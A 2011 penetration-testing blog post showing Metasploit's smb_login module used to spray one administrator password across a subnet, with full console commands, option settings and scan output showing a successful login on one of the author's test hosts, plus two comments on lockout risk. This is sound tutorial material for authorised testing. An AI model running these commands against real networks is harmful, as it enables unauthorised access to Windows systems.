Testing Windows Passwords with Metasploit

An attacker will take the path of least resistance in order to gain access to critical systems and data. During a penetration test we’ll take the same tactic as well.

Frequently this is accomplished by guessing a password to a users account and then either using the privileges of that account to gain access to critical data or escalating that account to an administrator or root level account. Once credentials have been acquired for one host you’ll want to determine what other systems they work against. It is fairly common to gain access to a local administrator account on a workstation or server for example, but not a domain account and in this case you will want to try that local administrator account against a whole slew of other systems.

There are a number of ways to accomplish this task but one of the most efficient ways is using the smb_login module of Metasploit Framework 4 to test a single username/password combination against a lot of boxes very quickly.

msf > use auxiliary/scanner/smb/smb_login
msf  auxiliary(smb_login) > set smbpass Password!
smbpass => Password!
msf  auxiliary(smb_login) > set smbuser administrator
smbuser => administrator
msf  auxiliary(smb_login) > set user_as_pass false
user_as_pass => false
msf  auxiliary(smb_login) > set rhosts 10.0.0.100-110
rhosts => 10.0.0.100-110
msf  auxiliary(smb_login) > show options
Module options (auxiliary/scanner/smb/smb_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASS_FILE                          no        File containing passwords, one per line
   PRESERVE_DOMAINS  true             no        Respect a username that contains a domain name.
   RHOSTS            10.0.0.100-110   yes       The target address range or CIDR identifier
   RPORT             445              yes       Set the SMB service port
   SMBDomain         WORKGROUP        no        SMB Domain
   SMBPass           Password!        no        SMB Password
   SMBUser           administrator    no        SMB Username
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      true             no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
msf  auxiliary(smb_login) > exploit

[*] 10.0.0.100:445 SMB - Starting SMB login bruteforce
[*] 10.0.0.101:445 SMB - Starting SMB login bruteforce
[*] Scanned 02 of 11 hosts (018% complete)
[*] 10.0.0.102:445 SMB - Starting SMB login bruteforce
[*] Scanned 03 of 11 hosts (027% complete)
[*] 10.0.0.103:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 04 of 11 hosts (036% complete)
[*] 10.0.0.104:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 05 of 11 hosts (045% complete)
[*] 10.0.0.105:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 06 of 11 hosts (054% complete)
[*] 10.0.0.106:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 07 of 11 hosts (063% complete)
[*] 10.0.0.107:445 SMB - [1/2] - Starting SMB login bruteforce
[*] 10.0.0.107:445 SMB - [1/2] - |WORKGROUP - FAILED LOGIN (Windows 5.1) administrator :  (STATUS_LOGON_FAILURE)
[+] 10.0.0.107:445|WORKGROUP - SUCCESSFUL LOGIN (Windows 5.1) 'administrator' : 'Password!'
[*] Scanned 08 of 11 hosts (072% complete)
[*] 10.0.0.108:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 09 of 11 hosts (081% complete)
[*] 10.0.0.109:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 10 of 11 hosts (090% complete)
[*] 10.0.0.110:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(smb_login) >

In this example I successfully compromised one of my test systems that was using the password ‘Password!’ for the local administrator account. This may seem far fetched, but I’ve seen worse than this before on engagements.

Be aware that this type of activity is very noisy and easily detectable by a sysadmin or security goon, as it will create a failed login attempt for the Administrator account on every machine in the subnet.

Posted on August 17, 2011 by Mark Marshall in Main

2 Responses to Testing Windows Passwords with Metasploit

  1. Mark Marshall August 18, 2011

    A brute force attack or an aggressive password guessing attack is very noisy and will likely lock out user accounts depending on how the group policies for that domain have been configured. This post was about trying 2 passwords (username as the password, as well as Password!) quickly against an entire subnet of hosts.
    This tactic has a very low probability of locking any accounts out given that even the most restrictive lockout policies are generally 3 failed attempts in x minutes.

  2. Simon August 18, 2011

    So brute forcing windows accounts isn’t generally a very good idea due to lockout settings and the possibility of creating a Denial of Service condition. Most windows networks have group policies that enforce a lockout of X minutes after Y failed attempts. As such, brute force attacks are pretty much too risky…

Add a Comment